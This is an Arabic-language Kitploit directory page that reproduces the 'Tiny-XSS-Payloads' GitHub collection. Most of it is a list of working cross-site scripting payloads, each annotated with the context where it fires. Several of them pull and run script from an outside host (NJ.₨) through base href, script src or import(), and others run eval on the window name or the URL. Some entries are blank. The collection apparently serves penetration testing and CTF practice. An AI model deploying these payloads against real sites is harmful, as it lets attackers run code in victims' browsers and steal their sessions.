Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Tiny-XSS-Payloads — مجموعة من حمولات XSS الصغيرة التي يمكن استخدامها في سياقات مختلفة. https://tinyxss.terjanq.me | Kitploit
أدوات/GitHubGitHub/terjanq/tiny-xss-payloads
توليد الحمولةأمن الويبCTFموارد منسقة
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

مجموعة من حمولات XSS الصغيرة التي يمكن استخدامها في سياقات مختلفة. https://tinyxss.terjanq.me

عرض المستودعالموقع الإلكتروني
2.4k2184منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Tiny-XSS-Payloads

مجموعة من حمولات XSS القصيرة التي يمكن استخدامها في سياقات مختلفة.

العرض التوضيحي متاح هنا: https://tinyxss.terjanq.me

الحمولات الحالية

root@kitploit:~
<!-- Requires a relative script inserted to the DOM after the sink, 
  e.g. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
root@kitploit:~
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->

root@kitploit:~
<!-- Just a casual script -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- If you control the name of the window -->

root@kitploit:~
<!-- If you control the URL -->

root@kitploit:~
<!-- If number of iframes on the page is constant -->

root@kitploit:~
<!-- for Firefox only -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- If number of iframes on the page is random -->

root@kitploit:~
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
</script>">
root@kitploit:~
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
root@kitploit:~
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

مهملة:

root@kitploit:~
<!-- If you control the URL, Safari-only -->

root@kitploit:~
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
تنزيل الأداة